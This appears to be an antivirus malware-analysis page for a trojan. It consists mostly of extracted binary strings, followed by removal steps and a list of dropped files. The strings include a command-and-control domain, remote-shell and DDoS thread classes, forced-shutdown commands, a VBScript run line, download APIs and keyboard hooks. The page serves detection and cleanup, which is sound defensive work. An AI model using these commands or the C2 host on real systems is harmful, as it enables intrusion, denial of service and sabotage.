/></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
7Dispatch methods do not support more than 64 parameters&Cannot change the size of a JPEG image
JPEG error #%d
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)*Windows socket error: %s (%d), on API '%s'
Asynchronous socket error %d
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
1, 0, 6, 6
- Skin.dll
1, 1, 0, 0
ESPI11.dll
1.2.7.0
(*.*)
2.6.0.0
%original file name%.exe_348_rwx_0D6D0000_0003F000:
`.rsrc
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll
svchost.exe_2672:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
THintActionD%C
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
svchost.exe
778691.dowei8.com
127.0.0.1
%Program Files%\ie8\
Windows
iexplore.exe
ole32.dll
SourcePort
DestPort
UnitTCPIP
TCPIPORT
TCPIPORT4
ws2_32.dll
iphlpapi.dll
1.2.3
<?xml version="1.0" encoding="UNICODE"?><tree2xml app="SVCHOST.exe">
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
(The key is too long to be read.)
HKEY_DYN_DATA
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
cmd /c "
%dMB,
" WindowsPath="
" ExeShortName="
" ExeFileName="
\Software\Microsoft\Windows\CurrentVersion\uninstall
\software\microsoft\windows\currentversion\uninstall\
TRemoteShellCmdU
TtcpDDOSThread
TwebDDOSThread
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
hXXp://
advapi32.dll
cmd /c shutdown -s -f -t 0
cmd /c shutdown -r -f -t 0
Down.exe
Set objws=WScript.CreateObject("wscript.shell")objws.Run kavpath,,true
ctfmon.exe
Move.exe
Port
UDPSockError
TMYNMUDP
MYNMUDP
RemotePort<
LocalPort<
ReportLevelL
0.0.0.0
%d.%d.%d.%d
FilterGraph %p pid %x
D:\dat_aq\DSPACK234\src\DSPack\DSUtil.pas
($%x).
vpDoNotRenderColorKeyAndBorder
Operation
TOnDVDCMD
CmdID
OnDVDCMDStartx0I
OnDVDCMDEndL[A
OnDVDWarningFormatNotSupportedL[A
D:\dat_aq\DSPACK234\src\DSPack\DSPack.pas
FormKeyDown
Msxml2.XMLHTTP
\Program Files\Internet Explorer\iexplore.exe
ntdll.dll
Kernel32.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
192.168.11.130
user32.dll
GetKeyboardType
RegOpenKeyExA
RegCloseKey
ReportEventA
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyA
WinExec
GetWindowsDirectoryA
GetCPInfo
CreatePipe
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
SetProcessWindowStation
OpenWindowStationA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetProcessWindowStation
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetAsyncKeyState
EnumWindows
EnumThreadWindows
CloseWindowStation
ActivateKeyboardLayout
shell32.dll
ShellExecuteExA
ShellExecuteA
SHFileOperationA
wininet.dll
InternetOpenUrlA
URLMON.DLL
URLDownloadToFileA
wsock32.dll
avicap32.dll
imagehlp.dll
winmm.dll
ADVAPI32.DLL
DeleteUrlCacheEntry
quartz.dll
KWindows
UrlMon
.ScktComp
IMYNMUDP
CMDUnit
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
VMROptions.Mode
MediaType.data
BaseFilter.data
<requestedExecutionLevel level="requireAdministrator"/>
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\dlldy[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\gengxin[1].htm (232 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
C:\svchost.exe (3797 bytes)
C:\Proxy.dll (151 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@xie6[1].txt (203 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.